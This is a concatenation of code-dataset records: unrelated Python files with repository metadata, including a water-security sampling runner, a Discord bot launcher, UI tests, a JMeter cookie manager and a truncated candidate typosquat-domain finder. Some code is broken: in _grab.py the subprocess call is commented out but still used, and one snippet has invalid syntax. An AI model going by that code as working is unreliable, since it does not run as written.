USEPA/Water-Security-Toolkit
6b6b68e0e1b3dcc8023b453ab48a64f7fd740feb
[ "BSD-3-Clause" ]
null
null
null
packages/dinesti/python/_grab.py
USEPA/Water-Security-Toolkit
6b6b68e0e1b3dcc8023b453ab48a64f7fd740feb
[ "BSD-3-Clause" ]
2
2020-09-24T19:04:14.000Z
2020-12-05T18:11:43.000Z
# Copyright (2013) Sandia Corporation. Under the terms of Contract # DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government # retains certain rights in this software. # # This software is released under the FreeBSD license as described # in License.txt import time import string import subprocess import os import tempfile from multiprocessing import Process import _gui from _gui import FakeFile import json # Python 2.6 or later def createYmlFile(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, dSampleTime, nSampleCount, sOutputPrefix): file = tempfile.NamedTemporaryFile(delete=False, suffix='.yml') _gui.writeLine(file,"# written using dinesti web gui") _gui.writeLine(file,"") _gui.writeLine(file,"network:") _gui.writeLine(file," epanet file: " + fINP.name) #_gui.writeLine(file," wqm file: " + fWQM.name) # moved to grabsample section #_gui.writeLine(file," hydraulic timestep: None") # no longer available _gui.writeLine(file," water quality timestep: None") _gui.writeLine(file," simulation duration: None") _gui.writeLine(file,"") _gui.writeLine(file,"scenario:") # used to be called 'events' _gui.writeLine(file," scn file: " + fSCN.name) # for _inversion LP (optimization) _gui.writeLine(file," tsg file: " + fTSG.name) # for _inversion STEP (optmization) _gui.writeLine(file," ignore merlion warnings: False") # moved from network section _gui.writeLine(file,"") #_gui.writeLine(file,"solver:") #_gui.writeLine(file," cplex:") #_gui.writeLine(file," mipgap: 0.02") #_gui.writeLine(file," threads: 1") _gui.writeLine(file,"") #_gui.writeLine(file,"samplelocation:") _gui.writeLine(file,"grabsample:") _gui.writeLine(file," wqm file: " + fWQM.name) # moved from network section _gui.writeLine(file," model format: PYOMO") # AMPL or PYOMO _gui.writeLine(file," sample time: " + str(dSampleTime / 60)) # minutes _gui.writeLine(file," threshold: 0.01") # default = 0.001 _gui.writeLine(file," fixed sensor file: " + fSEN.name) #_gui.writeLine(file," not allowed locations file: None") # no longer available _gui.writeLine(file," allowed locations file: " + fNodes.name) # TODO _gui.writeLine(file," N samples: " + str(nSampleCount)) # default = 3 _gui.writeLine(file," greedy selection: True") _gui.writeLine(file,"") _gui.writeLine(file,"configure:") _gui.writeLine(file," ampl executable: ampl")#" + sInstallDir + "bin/ampl") _gui.writeLine(file," pyomo executable: pyomo")#" + sInstallDir + "bin/pyomo") _gui.writeLine(file," output prefix: " + sOutputPrefix) _gui.writeLine(file,"") #_gui.writeLine(file,"internal:") #_gui.writeLine(file," nodeNames: None") #_gui.writeLine(file," nodeIndices: None") return file def createInpFile(data): text = _gui.getFile(data["docId"], data["fileName"]) temp = tempfile.NamedTemporaryFile(delete=False, suffix='.inp') temp.write(text) return temp def createScnFile(uuid): return FakeFile() def createTsgFile(uuid): temp = tempfile.NamedTemporaryFile(delete=False, suffix='.tsg') data = _gui.getView("m_ScenariosList?key=\"" + uuid + "\"") for row in data["rows"]: text = _gui.getFile(row["id"], row["value"]["fileName"]) temp.write(text + "\n") return temp def createSenFile(uuid): temp = tempfile.NamedTemporaryFile(delete=False, suffix='.sen') doc = _gui.getDoc(uuid) sensors = _gui.getValue(doc, "sensors", "") sensors = sensors.split("\n") bFirst = True for line in sensors: s = line.strip() if len(s) > 0: if not bFirst: temp.write("\n") bFirst = False temp.write(s) return temp def createNodesFile(Nodes): temp = tempfile.NamedTemporaryFile(delete=False, suffix='.nodes') for node in Nodes: temp.write(node + "\n") return temp def runWst(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix): nStart = time.time() sInstallDir = _gui.getInstallDir() args = [sInstallDir + "python/bin/wst", "grabsample", fYML.name] # p = subprocess.Popen(args, stdout=subprocess.PIPE) doc = _gui.getDoc(sUuid) sampleTime = doc.get("sampleTime") inp_info = doc.get("docFile_INP") duration = inp_info.get("duration") bErrorOverTime = False if sampleTime <> None and duration <> None: if sampleTime > duration: bErrorOverTime = True doc["pid"] = str(p.pid) doc["status"] = "Running" res = _gui.setDoc(doc) #doc = _gui.getDoc(sUuid) com = p.communicate() sOut = com[0] # sFile = sOutputPrefix + "_grabsample_results.json" results = _gui.readJsonFile(sFile, {"Error": "output file was not created: " + sFile}) sOUT = sOutputPrefix + "_samplelocation.out" debug_text_out_file = _gui.readFile(sOUT) doc = _gui.getDoc(sUuid) bError = False if bErrorOverTime: sError = "the sample time is after the end of the simulation." results = {"Error": sError} doc["Error"] = sError bError = True elif results.get("Error") <> None: doc["Error"] = results["Error"] bError = True doc["results"] = results doc["results"]["sampleTime"] = results.get("sampleTime", 0) * 60 # TODO - this should be changed in the grabsample executable doc["debug_fileSCN"] = fSCN.name doc["debug_fileTSG"] = fTSG.name doc["debug_stdout"] = com[0] doc["returnCode"] = p.returncode doc["debug_text_out_file"] = debug_text_out_file # if com[1] == None: doc["debug_stderr"] = "\0" else: doc["debug_stderr"] = com[1] # sKill = "Signal handler called from" index = string.find(sOut, sKill) doc["debug_stdout_find_error_index"] = index # if _gui.bDeleteTempFiles(override=None): _gui.removeFiles([fWQM, fTSG, fSCN, fINP, fSEN, fNodes, fYML]) _gui.removeFile(sOutputPrefix + "_epanet.rpt") _gui.removeFile(sOutputPrefix + "_samplelocation.out") _gui.removeFile(sOutputPrefix + "_samplelocation.log") _gui.removeFile(sOutputPrefix + "_MERLION_LABEL_MAP.txt") _gui.removeFile(sOutputPrefix + "_GSP.dat") _gui.removeFile(sOutputPrefix + "_ampl.run") _gui.removeFile(sOutputPrefix + "_ampl.out") _gui.removeFile(sOutputPrefix + "_grabsample_results.dat") _gui.removeFile(sOutputPrefix + "_grabsample_results.json") # if index == -1 and p.returncode == 0: doc["status"] = "Complete" elif index == -1 or bError: doc["status"] = "Error" else: doc["status"] = "Stopped" # doc["timer"] = time.time() - nStart _gui.setDoc(sUuid, doc) return doc def runThreaded(doc, sOutputPrefix, bThreaded=True): sUuid = doc["_id"] dSampleTime = doc.get("sampleTime", 0) nSampleCount = doc.get("sampleCount", 3) docFile_INP = doc.get("docFile_INP") Nodes = doc.get("Nodes" ) fWQM = _gui.createWqmFile(docFile_INP) if fWQM == None: fINP = createInpFile(docFile_INP) fWQM = FakeFile() else: fINP = FakeFile() fSCN = createScnFile(sUuid) # FakeFile fTSG = createTsgFile(sUuid) fSEN = createSenFile(sUuid) if Nodes == None: fNodes = FakeFile() else: fNodes = createNodesFile(Nodes) fYML = createYmlFile(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, dSampleTime, nSampleCount, sOutputPrefix) _gui.closeFiles([fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML]) # if bThreaded: p = Process(target=runWst, args=(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix, )) p.start() else: return runWst(fINP, fWQM, fSCN, fTSG, fSEN, fNodes, fYML, sUuid, sOutputPrefix) return def run(sCall, sUuid, bThreaded=True): if sCall == "delete": return False if sCall == "rename": return False sDir = tempfile.gettempdir() os.chdir(sDir) doc = _gui.getDoc(sUuid) runThreaded(doc, sUuid, True) return _gui.respondJSON(json.dumps({})) def main(): _gui.setHost() for req in _gui.getRequests(): sDb = _gui.getQuery(req, "db") _gui.setDatabase(sDb) sCall = _gui.getQuery(req, "call") sUuid = _gui.getQuery(req, "uuid") bRetVal = run(sCall, sUuid, True) if bRetVal: continue _gui.respondJSON(json.dumps({})) if __name__ == "__main__": main()
7,789
7,789
0.705867
999
7,789
5.374374
0.269269
0.087167
0.116223
0.01788
0.196685
0.172658
0.122369
0.070404
0.056994
0.048054
0
0.00646
0.145462
7,789
1
7,789
7,789
0.80018
0.993966
0
0.117021
0
0
0.177388
0.021644
0
0
0
1
0
0
null
null
0
0.047872
null
null
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
null
0
0
1
0
1
0
0
0
0
0
0
0
0
6
99b9d977ad5ba85f80dfdf899e7e306d68769703
246
py
Python
main.py
FlamptX/topgg-webhook-cog
b937bbef71ada9a00b6e748475fa55e5cedbf6ee
[ "MIT" ]
1
2021-05-11T16:22:00.000Z
2021-05-11T16:22:00.000Z
main.py
FlamptX/topgg-webhook-cog
b937bbef71ada9a00b6e748475fa55e5cedbf6ee
[ "MIT" ]
null
null
null
main.py
FlamptX/topgg-webhook-cog
b937bbef71ada9a00b6e748475fa55e5cedbf6ee
[ "MIT" ]
null
null
null
from discord.ext import commands from configparser import ConfigParser parser = ConfigParser() parser.read("config.txt") TOKEN = parser.get('config', 'token') bot = commands.Bot(command_prefix='!') bot.load_extension("Webhook") bot.run(TOKEN)
20.5
38
0.760163
32
246
5.78125
0.59375
0.194595
0
0
0
0
0
0
0
0
0
0
0.097561
246
11
39
22.363636
0.833333
0
0
0
0
0
0.117886
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99b9dbb04990991f85b416338b39b80cb298f798
567
py
Python
test_ghost/test_01_basic_functionality.py
prosky-pmaj/python-framework-for-web-ui-and-api-testing
6218aca2e5a45f26507ab624724e1f17dca5546f
[ "MIT" ]
null
null
null
test_ghost/test_01_basic_functionality.py
prosky-pmaj/python-framework-for-web-ui-and-api-testing
6218aca2e5a45f26507ab624724e1f17dca5546f
[ "MIT" ]
null
null
null
test_ghost/test_01_basic_functionality.py
prosky-pmaj/python-framework-for-web-ui-and-api-testing
6218aca2e5a45f26507ab624724e1f17dca5546f
[ "MIT" ]
null
null
null
from components.ghost.blogPage import BlogPage from components.ghost.adminPanelPage import AdminPanelPage class TestBlogPage(BlogPage): def test_01_open_blog_page(self): self.go_to() assert self.get_title() == "Blog for Testing" class TestAdminPanelPage(AdminPanelPage): def test_01_open_admin_panel_page(self): self.go_to() assert self.is_log_in_required() def test_02_log_in_to_admin_panel(self): self.go_to() self.log_in_as_admin() assert not self.is_log_in_required() self.logOut()
27
58
0.714286
78
567
4.833333
0.423077
0.05305
0.079576
0.095491
0.228117
0.137931
0.137931
0
0
0
0
0.013274
0.202822
567
20
59
28.35
0.820796
0
0
0.2
0
0
0.028219
0
0
0
0
0
0.2
1
0.2
false
0
0.133333
0
0.466667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99ba4295d40e9eb27422490957fc057fa213b493
1,038
py
Python
data_prep/yelp_dataset/fix_user.py
Nithanaroy/GeoReachRecommender
74443bad1cb363582736f8fa9294a91321848def
[ "MIT" ]
1
2020-03-25T17:39:10.000Z
2020-03-25T17:39:10.000Z
data_prep/yelp_dataset/fix_user.py
Nithanaroy/GeoReachRecommender
74443bad1cb363582736f8fa9294a91321848def
[ "MIT" ]
null
null
null
data_prep/yelp_dataset/fix_user.py
Nithanaroy/GeoReachRecommender
74443bad1cb363582736f8fa9294a91321848def
[ "MIT" ]
4
2017-01-21T15:16:55.000Z
2020-03-28T17:43:47.000Z
""" { 'type': 'user', 'user_id': (encrypted user id), 'name': (first name), 'review_count': (review count), 'average_stars': (floating point average, like 4.31), 'votes': {(vote type): (count)}, 'friends': [(friend user_ids)], 'elite': [(years_elite)], 'yelping_since': (date, formatted like '2012-03'), 'compliments': { (compliment_type): (num_compliments_of_this_type), ... }, 'fans': (num_fans), } """ import json def main(f, o): with open(f, 'r') as fp: res = [] out = open(o, 'w') for u in fp.read().splitlines(): user = json.loads(u) d = {} d['_id'] = user['user_id'] d['name'] = user['name'] d['review_count'] = user['review_count'] d['friends_count'] = len(user['friends']) res.append(json.dumps(d)) out.write('[' + ',\n'.join(res) + ']') out.close() if __name__ == '__main__': main('../dataset/user.json', '../dataset/out.json')
25.95
58
0.504817
122
1,038
4.090164
0.52459
0.088176
0.04008
0
0
0
0
0
0
0
0
0.012129
0.285164
1,038
39
59
26.615385
0.660377
0.44316
0
0
0
0
0.203509
0
0
0
0
0
0
1
0.058824
false
0
0.058824
0
0.117647
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bb6a49211d151c035db736f93150d9bd8b0d82
5,085
py
Python
src/GlobalTracker/scene.py
lleon95/NanoSciTracker-Python
f682c1f3b9b9f76a6de8ea816df910715539edf1
[ "Apache-2.0" ]
null
null
null
src/GlobalTracker/scene.py
lleon95/NanoSciTracker-Python
f682c1f3b9b9f76a6de8ea816df910715539edf1
[ "Apache-2.0" ]
null
null
null
src/GlobalTracker/scene.py
lleon95/NanoSciTracker-Python
f682c1f3b9b9f76a6de8ea816df910715539edf1
[ "Apache-2.0" ]
null
null
null
# NanoSciTracker - 2020 # Author: Luis G. Leon Vega <luis@luisleon.me> # # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # # This project was sponsored by CNR-IOM import copy import cv2 as cv import LocalTracker.detector as Detector import LocalTracker.drawutils as DrawUtils import LocalTracker.tracker as Tracker import LocalTracker.matcher as DetectionMatcher import Matcher.matcher as FeatureMatcher class Scene: def __init__( self, ROI=None, overlap=0, detection_sampling=3, detection_roi=None, settings=None ): # Get coordinates self.roi = ROI x, y = self.roi self.x0, self.x1 = x self.y0, self.y1 = y self.w = self.x1 - self.x0 self.h = self.y1 - self.y0 self.overlap = overlap self.frame = None # ROIs if detection_roi is None: self.detection_roi = ( self.overlap, self.overlap, self.w - self.overlap, self.h - self.overlap, ) else: self.detection_roi = detection_roi # BBs self.trackers = [] self.detections = [] self.new_detections = [] self.trackers_new_detections = [] self.trackers_out_scene = [] self.dead_trackers = [] # Settings self._settings = settings if settings is None: raise RuntimeError("Scene settings are not valid") self.batches = self._settings.set_if_defined("batches", 2) self.grayscale = self._settings.set_if_defined("grayscale", True) self.world_size = self._settings.set_if_defined("world_size", None) self.counter = 0 self.detection_sampling = detection_sampling def load_frame(self, frame): self.frame = frame def detect(self, gray_frame): padding = self._settings.set_if_defined("padding", None) return Detector.detect(gray_frame, self.batches, padding=padding) def track(self, colour_frame): Tracker.updateTrackers(colour_frame, self.trackers, ROI=self.detection_roi) return Tracker.retrieveBBs(self.trackers) def update(self, colour_frame=None): if not colour_frame is None: self.frame = colour_frame gray_detect = cv.cvtColor(self.frame, cv.COLOR_BGR2GRAY) # Perform detections and filter the new ones if self.counter % self.detection_sampling == 0: self.detections = self.detect(gray_detect) self.new_detections = DetectionMatcher.inter_match( self.detections, self.trackers ) # Deploy new trackers accordingly self.trackers_new_detections = Tracker.deployTrackers( self.frame, self.new_detections, self.trackers, ROI=self.detection_roi, offset=(self.x0, self.y0), grayscale=self.grayscale, world_size=self.world_size, ) else: self.new_detections = [] self.trackers_new_detections = [] # Perform tracking update self.track(self.frame) # Catch trackers which went out of scene self.trackers_out_scene = Tracker.retrieveOutScene(self.trackers) self.dead_trackers = Tracker.retrieveDeadTrackers(self.trackers) self.counter += 1 return ( self.trackers, self.trackers_out_scene, self.trackers_new_detections, self.dead_trackers, ) def draw(self, colour_frame): """ Purple: New detections Red: Detections Blue: Trackers Light blue: Out of scene """ colour_copy = copy.deepcopy(colour_frame) # Draw detections colour_copy = DrawUtils.draw_detections( colour_copy, self.new_detections, (255, 0, 255) ) colour_copy = DrawUtils.draw_detections( colour_copy, self.detections, (0, 0, 255) ) # Draw trackers colour_copy = DrawUtils.draw_trackers(colour_copy, self.trackers, (255, 0, 0)) colour_copy = DrawUtils.draw_trackers( colour_copy, self.trackers_out_scene, (255, 255, 0) ) return colour_copy
33.019481
86
0.627139
594
5,085
5.227273
0.296296
0.0657
0.027375
0.032206
0.171337
0.111433
0.091465
0.064412
0.034138
0
0
0.013943
0.294789
5,085
153
87
33.235294
0.851924
0.223992
0
0.121212
0
0
0.01577
0
0
0
0
0
0
1
0.060606
false
0
0.070707
0
0.181818
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bbb76447ce3721bfcbb6a8e1979553d2d5700b
310
py
Python
latex/code/paradigms/oop/class_abstract.py
nikoladze/icsc-paradigms-and-patterns
019e51b6fa7747a9a7ee24ca48315e1988565ef2
[ "CC0-1.0", "CC-BY-4.0" ]
10
2020-09-28T12:14:31.000Z
2021-09-22T18:38:13.000Z
latex/code/paradigms/oop/class_abstract.py
nikoladze/icsc-paradigms-and-patterns
019e51b6fa7747a9a7ee24ca48315e1988565ef2
[ "CC0-1.0", "CC-BY-4.0" ]
5
2020-09-28T13:40:52.000Z
2021-12-06T16:38:09.000Z
latex/code/paradigms/oop/class_abstract.py
nikoladze/icsc-paradigms-and-patterns
019e51b6fa7747a9a7ee24ca48315e1988565ef2
[ "CC0-1.0", "CC-BY-4.0" ]
5
2020-09-28T13:10:45.000Z
2021-12-06T16:05:16.000Z
from abc import ABC, abstractmethod class Shape(ABC): @abstractmethod def calculate_area(self): pass @abstractmethod def draw(self): pass class Rectangle(Shape): def __init__(self, ...): ... def calculate_area(self): # concrete implementation here
15.5
38
0.619355
32
310
5.8125
0.53125
0.182796
0.172043
0.215054
0
0
0
0
0
0
0
0
0.287097
310
19
39
16.315789
0.841629
0.090323
0
0.5
0
0
0
0
0
0
0
0
0
0
null
null
0.166667
0.083333
null
null
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
3
99bc36674ac9930132b7fa40a1504d6148e42d4d
7,573
py
Python
jmeter_api/configs/http_cookie_manager/elements.py
dashawn888/jmeter_api
1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd
[ "Apache-2.0" ]
11
2020-03-22T13:30:21.000Z
2021-12-25T06:23:44.000Z
jmeter_api/configs/http_cookie_manager/elements.py
dashawn888/jmeter_api
1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd
[ "Apache-2.0" ]
37
2019-12-18T13:12:50.000Z
2022-02-10T10:52:37.000Z
jmeter_api/configs/http_cookie_manager/elements.py
dashawn888/jmeter_api
1ab5b02f3a7c8ad1b84fc50db4fe1fc2fa7c91bd
[ "Apache-2.0" ]
5
2019-12-06T10:55:56.000Z
2020-06-01T19:32:32.000Z
import logging from typing import List, Optional from enum import Enum from xml.etree.ElementTree import Element from jmeter_api.basics.config.elements import BasicConfig from jmeter_api.basics.utils import Renderable, FileEncoding, tree_to_str class CookiePolicy(Enum): STANDARD = 'standard' STANDARD_STRICT = 'standard-strict' IGNORE = 'ignoreCookies' NETSCAPE = 'netscape' DEFAULT = 'default' RFC2109 = 'rfc2109' RFC2965 = 'RFC2965' BEST_MATCH = 'best-match' class Cookie(Renderable): TEMPLATE = 'cookie.xml' root_element_name = 'elementProp' def __init__(self, *, name: str, value: str, domain: str = '', path: str = '', secure: bool = False, expires: int = 0, path_specified: bool = True, domain_specified: bool = True): self.name = name self.value = value self.domain = domain self.path = path self.secure = secure self.expires = expires self.path_specified = path_specified self.domain_specified = domain_specified @property def name(self) -> str: return self._name @name.setter def name(self, value): if not isinstance(value, str): raise TypeError( f'name must be str. {type(value).__name__} was given') self._name = value @property def value(self) -> str: return self._value @value.setter def value(self, value): if not isinstance(value, str): raise TypeError( f'value must be str. {type(value).__name__} was given') self._value = value @property def domain(self) -> str: return self._domain @domain.setter def domain(self, value): if not isinstance(value, str): raise TypeError( f'domain must be str. {type(value).__name__} was given') self._domain = value @property def path(self) -> str: return self._path @path.setter def path(self, value): if not isinstance(value, str): raise TypeError( f'path must be str. {type(value).__name__} was given') self._path = value @property def expires(self) -> str: return self._expires @expires.setter def expires(self, value): if not isinstance(value, int): raise TypeError( f'expires must be int. {type(value).__name__} was given') self._expires = str(value) @property def secure(self) -> str: return self._secure @secure.setter def secure(self, value): if not isinstance(value, bool): raise TypeError( f'secure must be bool. {type(value).__name__} was given') self._secure = str(value).lower() @property def path_specified(self) -> str: return self._path_specified @path_specified.setter def path_specified(self, value): if not isinstance(value, bool): raise TypeError( f'path_specified must be bool. {type(value).__name__} was given') self._path_specified = str(value).lower() @property def domain_specified(self) -> str: return self._domain_specified @domain_specified.setter def domain_specified(self, value): if not isinstance(value, bool): raise TypeError( f'domain_specified must be bool. {type(value).__name__} was given') self._domain_specified = str(value).lower() def to_xml(self) -> str: xml_tree: Optional[Element] = super().get_template() element_root = xml_tree.find(self.root_element_name) element_root.attrib['name'] = self.name element_root.attrib['testname'] = self.name for element in list(element_root): try: if element.attrib['name'] == 'Cookie.value': element.text = self.value elif element.attrib['name'] == 'Cookie.domain': element.text = self.domain elif element.attrib['name'] == 'Cookie.path': element.text = self.path elif element.attrib['name'] == 'Cookie.secure': element.text = self.secure elif element.attrib['name'] == 'Cookie.expires': element.text = self.expires elif element.attrib['name'] == 'Cookie.path_specified': element.text = self.path_specified elif element.attrib['name'] == 'Cookie.domain_specified': element.text = self.domain_specified except KeyError: logging.error( f'Unable to properly convert {self.__class__} to xml.') return tree_to_str(xml_tree) class HTTPCookieManager(BasicConfig, Renderable): root_element_name = 'CookieManager' def __init__(self, *, cookies: List[Cookie] = [], clear_each_iter: bool = False, policy: CookiePolicy = CookiePolicy.STANDARD, name: str = 'HTTP Cookie Manager', comments: str = '', is_enabled: bool = True): self.cookies = cookies self.policy = policy self.clear_each_iter = clear_each_iter super().__init__(name=name, comments=comments, is_enabled=is_enabled) @property def policy(self): return self._policy @policy.setter def policy(self, value): if not isinstance(value, CookiePolicy): raise TypeError( f'policy must be CookiePolicy. {type(value).__name__} was given') self._policy = value @property def clear_each_iter(self) -> str: return self._clear_each_iter @clear_each_iter.setter def clear_each_iter(self, value): if not isinstance(value, bool): raise TypeError( f'clear_each_iter must be bool. {type(value).__name__} was given') self._clear_each_iter = str(value).lower() @property def cookies(self) -> str: return self._cookies @cookies.setter def cookies(self, value): if not isinstance(value, List): raise TypeError( f'arguments must be List. {type(value).__name__} was given') for el in value: if not isinstance(el, Cookie): raise TypeError( f'arguments must contain only Cookie. {type(value).__name__} was given') self._cookies = value def to_xml(self) -> str: element_root, xml_tree = super()._add_basics() for element in list(element_root): try: if element.attrib['name'] == 'CookieManager.cookies': element.text = '' for arg in self.cookies: element.text += arg.to_xml() elif element.attrib['name'] == 'CookieManager.clearEachIteration': element.text = self.clear_each_iter except KeyError: logging.error( f'Unable to properly convert {self.__class__} to xml.') if not self.policy is CookiePolicy.STANDARD: el = Element('stringProp', attrib={'name': 'CookieManager.policy'}) el.text = str(self.policy.value) element_root.append(el) return tree_to_str(xml_tree)
32.502146
88
0.575201
832
7,573
5.032452
0.127404
0.032243
0.02866
0.05732
0.433962
0.318128
0.238357
0.21925
0.21925
0.17005
0
0.003333
0.326555
7,573
232
89
32.642241
0.817647
0
0
0.242268
0
0
0.152119
0.047669
0
0
0
0
0
1
0.134021
false
0
0.030928
0.056701
0.304124
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99bc394d69ac0c2ddde0ba6fd63c903bf2c13144
13,338
py
Python
electionBuster.py
RarW0lf/electionBuster
394e92a972c0a6af260811985a8051af40ffa25d
[ "MIT" ]
16
2015-10-22T01:37:28.000Z
2018-10-17T13:05:44.000Z
electionBuster.py
RarW0lf/electionBuster
394e92a972c0a6af260811985a8051af40ffa25d
[ "MIT" ]
2
2018-02-10T00:05:43.000Z
2018-05-17T22:48:22.000Z
electionBuster.py
thorshand/electionBuster
394e92a972c0a6af260811985a8051af40ffa25d
[ "MIT" ]
4
2017-08-02T12:41:44.000Z
2018-08-14T16:16:41.000Z
#!/usr/bin/python3.5 ################################################## ## Author: Joshua Franklin, Kevin Franklin ## Example input to start: ## sudo ./electionBuster.py -f josh -l franklin -y 2014 -e senate -s pennsyltucky ## 6 arguments are passed: ## 1: The first name of the candidate (mandatory) ## 2: The middle name of the candidate (optional) ## 2: The last name of the candidate (mandatory) ## 3: The year of the election (mandatory) ## 4: The type of race, such as congress, senate, or president. (mandatory) ## 5: The state or region the candidate is from (optional) ################################################## #TODO: Add a keyboard interrupt import requests import sys import time import string import argparse import socket from datetime import date import urllib from multiprocessing import Pool as ThreadPool, Manager import collections import csv import operator from modules.utils import genAllDonate,genAll,generate_urls, tryURLforReal from modules.text_tools import alphabet,alt_alphabets,skipLetter,stringAndStrip,removeDups,reverseLetter,wrongVowel,tlds confirmedURLs = Manager().list() allURLS = Manager().list() class NameDenormalizer(object): def __init__(self, filename=None): filename = filename or 'names.csv' lookup = collections.defaultdict(list) with open(filename) as f: reader = csv.reader(f) for line in reader: matches = set(line) for match in matches: lookup[match].append(matches) self.lookup = lookup def __getitem__(self, name): name = name.upper() if name not in self.lookup: raise KeyError(name) return self.lookup[name] def get(self, name, default=None): try: return self[name] except KeyError: return set( [name] ) # Program Timer start_time = time.time() # Function: casts and removes those pesky \r and \n #Parse command line arguments parser = argparse.ArgumentParser(description='Identifies registered candidate domains') parser.add_argument('-f','--firstName', help='Candidate\'s first name',required=True) parser.add_argument('-m','--middleName',help='Candidate\'s optional middle name') parser.add_argument('-l','--lastName',help='Candidate\'s last name', required=True) parser.add_argument('-y','--year', help='Year of the election',required=True) parser.add_argument('-e','--electionType',help='Type of election (congress, senate, president)', required=True) parser.add_argument('-s','--state', help='Candidate\'s state of origin', action='append' ) #Exists for candidates like Mitt Romney that possibly have an attachment to two states (i.e., Utah, Massachusetts) parser.add_argument('-a','--aliasFileName', help='Filename containing a list of aliases') parser.add_argument('-p','--party', help='Party Affiliation') args = parser.parse_args() # Stores command line argumetns # Make all lowercase fName = args.firstName fName = fName.lower() lName = args.lastName lName = lName.lower() party = "" year = args.year shortYear = year[-2:] electionType = args.electionType electionType = electionType.lower() state = [] stateText = "" if (args.party) : party = args.party fileName = "states.csv" if (args.aliasFileName) : fileName = stringAndStrip( args.aliasFileName) if (args.state) : nd = NameDenormalizer( fileName ) for aState in args.state: stateText = stateText + aState.lower() state.append( stringAndStrip( aState.upper( ) ) ) statenick = list( nd.get( aState.upper() ) ) for s1 in statenick: for s in s1: state.append( s ) mName = "" middleInitial = "" if (args.middleName) : mName = args.middleName mName = mName.lower() middleInitial = mName[0] # This assigns the position variable if (electionType == 'congress') or (electionType == 'congressional') : position = 'congress' altPosition = 'congressman' # congresswoman?? elif electionType == 'senate' : position = 'senator' altPosition = 'senate' elif (electionType == 'governor') or (electionType == 'gubernatorial'): position = 'governor' altPosition = 'gov' elif (electionType == 'president') or (electionType == 'presidential') : position = 'president' altPosition = 'prez' elif (electionType == 'mayoral') or (electionType == 'mayor') : position = 'mayor' altPosition = 'mayoral' else : position = electionType altPosition = electionType # top-level domain-names # # consider removing .me, .info, and .biz if they aren't adding value # Runs stringAndStrip on everything except fileName b/c that's used elsewhere fName = stringAndStrip(fName) lName = stringAndStrip(lName) year = stringAndStrip(year) electionType = stringAndStrip(electionType) # Alerting the users to the types of sites we're expecting to find # This differs at times since the state variable isn't mandatory to run the script ## Consider deleting this - does it actually provide value? if (args.state) : print('We expect to find these URLs excluding subtle variances:') print('http://www.' + fName + lName + '.com') print('http://www.' + lName + fName + '.com') print('http://www.' + fName + year + '.com') print('http://www.' + lName + year + '.com') print('http://www.' + fName + lName + year + '.com' ) for stateAlias in state: print('http://www.' + fName + lName + 'for' + stateAlias + '.com') print('http://www.' + lName + 'for' + stateAlias + '.com') print('http://www.' + fName + 'for' + stateAlias + '.com') print('http://www.' + fName + lName + 'for' + position + '.com') print('http://www.' + fName + 'for' + position + '.com') print('http://www.' + fName + 'for' + position + year + '.com') print('http://www.' + position + fName + lName + '.com') else : print('We expect to find these URLs excluding subtle variances:') print('http://www.' + fName + lName + '.com') print('http://www.' + lName + fName + '.com') print('http://www.' + fName + year + '.com') print('http://www.' + lName + year + '.com') print('http://www.' + fName + lName + year + '.com' ) print('http://www.' + fName + lName + 'for' + position + '.com') print('http://www.' + fName + 'for' + position + '.com') print('http://www.' + fName + 'for' + position + year + '.com') print('http://www.' + position + fName + lName + '.com') # This is the result output files # Makes a unique filename based on data and time now = date.today() partyString = "" if ( args.party ) : partyString = "-" + party.lower() tempResults = 'results-' + fName + '-' + lName + '-' + stateText + partyString + '-' + str(now) + '.txt' resultsFile = open(tempResults, "w") # This clears the results files before reopening them resultsFile.close() resultsFile = open(tempResults, "a") ## Other alphabets are defined as a quick way of doing URL mangling. ## Is this a candidate for deletion? # alternative alphabets # 0: No change # 1: i -> 1 "Eye to One" # 2: l -> i "El to Eye" # 3: i -> l "Eye to El" # 4: o -> 0 "Oh to Zero" # 5: 0 -> o "Zero to Oh" # 6: n -> m "En to Em" TODO: Does this swap wrok right? # 7: m -> n "Em to En" # 8: e -> 3 "Ee to three" # 9: 3 -> e "Three to ee" # These are the template that we'll use based on the optional input parameters. # The first one is if the state was input. templates = generate_urls(first_name=args.firstName, last_name=args.lastName, state=state, middlename=args.middleName, position=position, altPosition=altPosition, year=args.year) # This generates the text mangling results = genAll(templates, alt_alphabets) # This generates the text mangling with some other alternatives resultsDonate = genAllDonate(templates, 